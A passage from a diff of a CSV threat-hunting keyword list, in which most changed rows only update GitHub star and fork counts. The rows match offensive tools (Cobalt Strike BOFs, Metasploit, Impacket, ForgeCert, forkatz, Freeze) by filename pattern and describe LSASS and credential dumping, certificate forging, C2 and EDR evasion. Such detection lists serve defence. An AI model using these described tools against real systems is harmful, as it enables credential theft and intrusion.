"*foreign_lsass.x86*","offensive_tool_keyword","cobaltstrike","LSASS Dumping With Foreign Handles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/alfarom256/BOF-ForeignLsass","1","1","N/A","10","10","96","25","2021-08-23T16:57:08Z","2021-08-21T00:19:29Z" -"*forge_ticket.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*forge_ticket_spec.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*ForgeCert.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*forge_ticket.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*forge_ticket_spec.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ForgeCert.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*ForgeCert-main*","offensive_tool_keyword","ForgeCert","ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.","T1553.002 - T1136.003 - T1059.001","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GhostPack/ForgeCert","1","1","N/A","10","6","538","87","2022-10-07T18:18:09Z","2021-06-09T22:04:18Z" "*forkatz.exe*","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/Barbarisch/forkatz","1","1","N/A","10","2","122","15","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z" "*forkatz.sln*","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/Barbarisch/forkatz","1","1","N/A","10","2","122","15","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z" @@ -10402,28 +10553,28 @@ "*--format-string ziiiiizzzb * ","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","490","114","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" "*--format-string ziiiiizzzib *","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","490","114","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" "*fortalice/bofhound*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" -"*fortra/impacket*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*fortra/impacket*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*FortyNorthSecurity*","offensive_tool_keyword","Github Username","FortyNorth Security is a computer security consultancy specializing in offensive security work. We regularly perform red team assessments. pen tests. and more","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/FortyNorthSecurity","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*FortyNorthSecurity/CIMplant*","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","1","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "*FortyNorthSecurity/FunctionalC2*","offensive_tool_keyword","FunctionalC2","A small POC of using Azure Functions to relay communications","T1021.006 - T1132.002 - T1071.001","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/FortyNorthSecurity/FunctionalC2","1","1","N/A","10","10","58","15","2023-03-30T20:27:38Z","2020-03-12T17:54:50Z" "*found-passwords.txt*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*FourEye(shellcode_bypass*","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","10","8","724","154","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" "*FourEye-main*","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","1","N/A","10","8","724","154","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" -"*fox-it/adconnectdump*","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","10","6","506","84","2023-08-21T00:00:08Z","2019-04-09T07:41:42Z" -"*fox-it/BloodHound*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1538","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*fox-it/adconnectdump*","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","10","6","507","84","2023-08-21T00:00:08Z","2019-04-09T07:41:42Z" +"*fox-it/BloodHound*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" "*foxlox/hypobrychium*","offensive_tool_keyword","hypobrychium","hypobrychium AV/EDR Bypass","T1562.001 - T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/foxlox/hypobrychium","1","1","N/A","8","1","72","21","2023-07-21T21:13:20Z","2023-07-18T09:55:07Z" -"*fpc -c Seatbelt*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*FrameManagementAssociationRequest.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*FrameManagementDeauthentication.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*FrameManagementProbeRequest.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*FrameManagementReassociationResponse.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*framework/obfuscation/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*framework-114634acb84f8baa.js*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" -"*Framework-MobSF*","offensive_tool_keyword","Mobile-Security-Framework-MobSF","Mobile Security Framework (MobSF) is an automated. all-in-one mobile application (Android/iOS/Windows) pen-testing. malware analysis and security assessment framework capable of performing static and dynamic analysis. MobSF support mobile app binaries (APK. XAPK. IPA & APPX) along with zipped source code and provides REST APIs for seamless integration with your CI/CD or DevSecOps pipeline.The Dynamic Analyzer helps you to perform runtime security assessment and interactive instrumented testing.","T1565.001 - T1565.002 - T1565.003 - T1565.004 - T1523","TA0007 - TA0010 - TA0003","N/A","N/A","Frameworks","https://github.com/MobSF/Mobile-Security-Framework-MobSF","1","1","N/A","N/A","10","14942","3006","2023-10-03T20:48:09Z","2015-01-31T04:36:01Z" +"*fpc -c Seatbelt*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*FrameManagementAssociationRequest.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*FrameManagementDeauthentication.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*FrameManagementProbeRequest.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*FrameManagementReassociationResponse.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*framework/obfuscation/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*framework-114634acb84f8baa.js*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*Framework-MobSF*","offensive_tool_keyword","Mobile-Security-Framework-MobSF","Mobile Security Framework (MobSF) is an automated. all-in-one mobile application (Android/iOS/Windows) pen-testing. malware analysis and security assessment framework capable of performing static and dynamic analysis. MobSF support mobile app binaries (APK. XAPK. IPA & APPX) along with zipped source code and provides REST APIs for seamless integration with your CI/CD or DevSecOps pipeline.The Dynamic Analyzer helps you to perform runtime security assessment and interactive instrumented testing.","T1565.001 - T1565.002 - T1565.003 - T1565.004 - T1523","TA0007 - TA0010 - TA0003","N/A","N/A","Frameworks","https://github.com/MobSF/Mobile-Security-Framework-MobSF","1","1","N/A","N/A","10","14948","3006","2023-10-03T20:48:09Z","2015-01-31T04:36:01Z" "*frampton.py*","offensive_tool_keyword","frampton","PE Binary Shellcode Injector - Automated code cave discovery. shellcode injection - ASLR bypass - x86/x64 compatible","T1055 - T1548.002 - T1129 - T1001","TA0002 - TA0003- TA0004 -TA0011","N/A","N/A","POST Exploitation tools","https://github.com/ins1gn1a/Frampton","1","1","N/A","N/A","1","69","16","2019-11-24T22:34:48Z","2019-10-29T00:22:14Z" -"*freenas_reverse_root_shell_csrf*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*Freeze_*_darwin_amd64*","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","1","N/A","N/A","10","1333","166","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z" -"*Freeze_*_linux_amd64*","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","1","N/A","N/A","10","1333","166","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z" +"*freenas_reverse_root_shell_csrf*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*Freeze_*_darwin_amd64*","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","1","N/A","N/A","10","1334","166","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z" +"*Freeze_*_linux_amd64*","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended 